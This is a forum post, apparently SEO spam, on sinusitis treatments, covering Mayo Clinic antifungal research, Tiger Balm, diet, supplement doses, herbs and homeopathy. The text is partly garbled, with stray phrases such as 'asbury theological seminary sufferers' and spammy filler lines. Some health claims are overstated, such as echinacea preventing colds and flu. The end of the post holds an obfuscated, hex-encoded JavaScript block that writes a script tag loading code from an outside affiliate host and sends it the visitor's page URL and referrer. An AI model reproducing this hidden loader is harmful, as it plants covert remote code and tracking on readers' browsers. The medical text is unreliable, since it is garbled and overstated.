Spray Sinusitis: Sinusitis Treatment: Help is on the Way

Go down

Spray Sinusitis: Sinusitis Treatment: Help is on the Way Empty Spray Sinusitis: Sinusitis Treatment: Help is on the Way

Post by Admin Tue Sep 20, 2016 5:51 pm

Spray Sinusitis and Sinusitis Treatment and Help is on

Mayo Clinic researchers have made great strides in recent years regarding sinusitis treatment and have come up with a new therapy for chronic sufferers called topical antifungal therapy. This particular sinusitis treatment is still new and is not widely practiced. This author, a sinusitis sufferer of long standing with two painful operations under his belt, has been in contact with one of the Mayo Clinic research physicians. I was pointed to several papers and articles describing the research completed thus far, the theory behind the research, and the resulting therapy. Evil or Very Mad

Topical antifungal therapy is a new form of natural sinus treatments. It takes time for a new approach to become accepted in the medical community at large. I asked the Mayo research physician if he knew of a colleague in the Denver area, where I reside, who was utilizing this approach. He responded that he didn't know anyone there, but gave me two names of physicians in Texas, which I also asked about. So it is obvious that this approach to sinusitis treatment is not yet mainstream therapy, but it does have momentum. For people who have received sinusitis treatment which has not improved their suffering, more details regarding this and other sinus related subjects can be found at the web site in the resource box for this article.

Also contacted Accentia, the biopharmaceutical company who has obtained a license from the Mayo Foundation to produce and market medications based on the Mayo Clinic research. They informed me that they plan to market a product based on Amphotericin B, which will have the brand name SinuNase. They will start clinical trials soon, and I submitted my name as a possible participant. Apparently I would be a good candidate since I've had sinus surgeries that didn't cure my problems. You may say that we have included exquisite information here on Sinusitis Treatment. This is with the intention of producing a unique article on Sinusitis Treatment.

Natural Remedy for Sinus Headache Help on Understanding Sinus

Spray Sinusitis: Sinusitis Treatment: Help is on the Way Sinus-headache226

Simple and general terms, the Mayo Clinic research showed that some people (i.e., chronic sinusitis sufferers), have a harmful immune reaction to fungi that others do not experience. The research demonstrated that fungi are present in the air and show up in the nasal mucus of just about everyone. In the noses of chronic sinus sufferers, it showed that certain types of white blood cells will attack the fungi that are present. In doing so these cells create a compound that damages nasal membranes. Once damaged, bacteria can easily enter and cause pain, inflammation and infection. Conventional sinusitis treatment often includes antibiotics to attack the bacteria. This new sinusitis treatment aims to attack the fungi instead, thus avoiding the nasal membrane damage in the first place. One drawback is that it is not easy to determine if a patient is someone whose white blood cells attack fungi in the nose or not. It is also not known why this white blood cell reaction occurs in some people and not in others. This is the counterpart to our previous paragraph on Sinus Treatment. Please read that paragraph to get a better understanding to this paragraph.

Antifungals such as Amphotericin B and Itraconazole are used in this sinusitis treatment regimen. These have already been approved by the FDA for other uses, and they can be mixed by a compounding pharmacy such as Anazao to make the topical solution needed for this new therapy. Amphotericin B, for example, was only available in my local pharmacy as an injection medication. The pharmacist was not aware that it is sometimes reformulated as a topical spray for sinusitis treatment. Patients spray the antifungal into their nostrils daily. About 75% asbury theological seminary sufferers in one of the Mayo Clinic studies saw significant improvement in their conditions following this regimen.

You're probably familiar with Tiger Balm, that strong-smelling oriental ointment that comes in a red tin decorated with a tiger. I have used it for colds and headaches, and I like it. Tiger Balm is filled with potent aromatic herbal extracts--menthol from peppermint, eugenol from cloves, cineole from cajuput (a close relative of teatree), cinnamaldehyde from cinnamon, and camphor. It clears the sinuses faster than a tiger can pounce. Sinusitis occurs when the mucous lining of the sinuses becomes inflamed. Anything that blocks the entry of air into the sinuses can result in inflammation: bacterial, viral, and fungal infections, allergies, polyps, or a deviated septum. Sinusitis is a common condition -- according to the American Academy of Otolaryngology, sinusitis affects 37 million people in the United States. Household dust and mould can aggravate sinusitis. Wash bed sheets regularly in hot water and invest in pillow covers specially designed to protect you from the many dust mites that live inside pillows. Keep the rest of your bedroom very clean. Very Happy.

General, a diet that is rich in vegetables, whole grains, and beans, and low in saturated fat (meat and dairy), sugar, mucous-forming, and allergenic foods will be beneficial to the sinuses. Echinacea, (pronounced eck-in-AY-sha) a safe and highly effective natural supplement, not only rapidly improves cold and flu symptoms, but can prevent these diseases.3 Most importantly, when echinacea is combined with two other herbs, white cedar and wild indigo, even greater health benefits can be achieved. You might also try one of the following supplements to boost immunity: - 1,000 mg vitamin C three times a day - 30 to 60 mg zinc a day - 15,000 IU beta-carotene a day Or to reduce inflammation: - 500 mg bromelain three times a day, taken between meals - 500 mg quercetin three times a day, taken between meals There are a variety of herbal treatments that help promote sinus drainage, relieve pain, and strengthen the immune system. Herbs can be taken in capsules, brewed in teas, or in tinctures. Try drinking one cup of tea or taking 30 to 60 drops of tincture every two to four hours of the following herbs, which can be effective taken individually or in combination: - Wild indigo - Eyebright - Licorice - Coneflower - Goldenseal - Garlic - Ginger Homeopathic remedies for sinusitis include arsenicum album, kali bichromicum, pulsatilla, and nux vomica. Consult an experienced homeopath for a recommendation on which remedy may be effective for you. Additional home treatments include alternating placing hot and cold wet washcloths on your face. Use a hot one for three minutes, then a cold one for one minute, and repeat three times. Try to do three sets a day. Eucalyptus, lavender, rosemary, or thyme oils added to a hot bath may give you some relief as well. Another option is to add two to five drops of one of these oils to a pot of water, bring to a simmer, and inhale the steam. Herbal teas: Using 1 tsp. dried herb per cup of hot water, steep 5 to 10 minutes for dried leaves or flowers, 10 to 20 minutes for dried roots. Tincture: A preparation made from alcohol or water and alcohol, containing an herb strength of 1 part herb to 5 parts solvent or 1 part herb to 10 parts solvent If there is the slightest possibility of you not getting to understand the matter that is written here on Sinusitis Common, we have some advice to be given. Use a dictionary!

Dehumidifier May be Necessary to Maintain Humidity Below 50%

Put away your humidifier -- they create a humid environment that is encouraging to dust mites. Foods that people with sinusitis should avoid are dairy, oranges, white sugar, and foods containing white flour, because they promote the formation of mucous. Sugar also has a negative effect on the ability of the immune system to clear bacteria. Aside from the major foods, wheat, soy, fermented foods, and eggs can be experimentally avoided for a couple of weeks to see if sinus symptoms improve, and then re-introduced to see if symptoms temporarily worsen. This article serves as a representative for the meaning of Sinus in the library of knowledge. Let it represent knowledge well.

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

https://andycamacho6.forumotion.com

Back to top Go down